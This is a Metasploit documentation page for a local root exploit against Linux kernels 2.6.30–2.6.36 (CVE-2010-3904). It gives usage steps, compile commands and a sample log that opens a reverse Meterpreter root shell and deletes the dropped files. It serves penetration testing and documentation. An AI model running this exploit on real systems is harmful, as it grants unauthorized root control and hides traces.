adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
ffe4dbcc19def7a2e5e6140b83b514b1f30ded98
metasploit-gs/documentation/modules/exploit/linux/local/rds_priv_esc.md
T
Brendan Coles 6858a1caf9 Add compilation instructions to documentation
2018-05-18 22:10:47 +10:00

2.5 KiB
Raw Blame History

Description

This module exploits a vulnerability in the rds_page_copy_user function in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8 to execute code as root (CVE-2010-3904).

Vulnerable Application

This module has been tested successfully on:

  • Fedora 13 (i686) with kernel version 2.6.33.3-85.fc13.i686.PAE
  • Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic

Verification Steps

  1. Start msfconsole
  2. Get a session
  3. use exploit/linux/local/rds_priv_esc
  4. set SESSION [SESSION]
  5. check
  6. run
  7. You should get a new root session

Options

SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

COMPILE

Options: Auto True False (default: Auto)

Whether the exploit should be live compiled with gcc on the target system, or uploaded as a pre-compiled binary.

Auto will first determine if gcc is installed to compile live on the system, and fall back to uploading a pre-compiled binary.

Compiled Executables

The module makes use of two pre-compiled exploit executables (rds.x86 and rds.x64), to be use when gcc is not available on the target host for live compiling, or COMPILE is set to False.

The executables were cross-compiled with musl-cross:

./x86_64-linux-musl-gcc -o rds.x64 -pie -static rds.c
./i486-linux-musl-gcc -o rds.x86 -pie -static rds.c

Scenarios

msf5 > use exploit/linux/local/rds_priv_esc
msf5 exploit(linux/local/rds_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/rds_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/rds_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Writing '/tmp/.zEAOL.c' (7282 bytes) ...
[*] Writing '/tmp/.kBTWC7E' (237 bytes) ...
[*] Launching exploit...
[*] Sending stage (853256 bytes) to 172.16.191.149
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.149:40103) at 2018-05-03 08:52:59 -0400
[+] Deleted /tmp/.zEAOL.c
[+] Deleted /tmp/.zEAOL
[+] Deleted /tmp/.kBTWC7E

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.149
OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink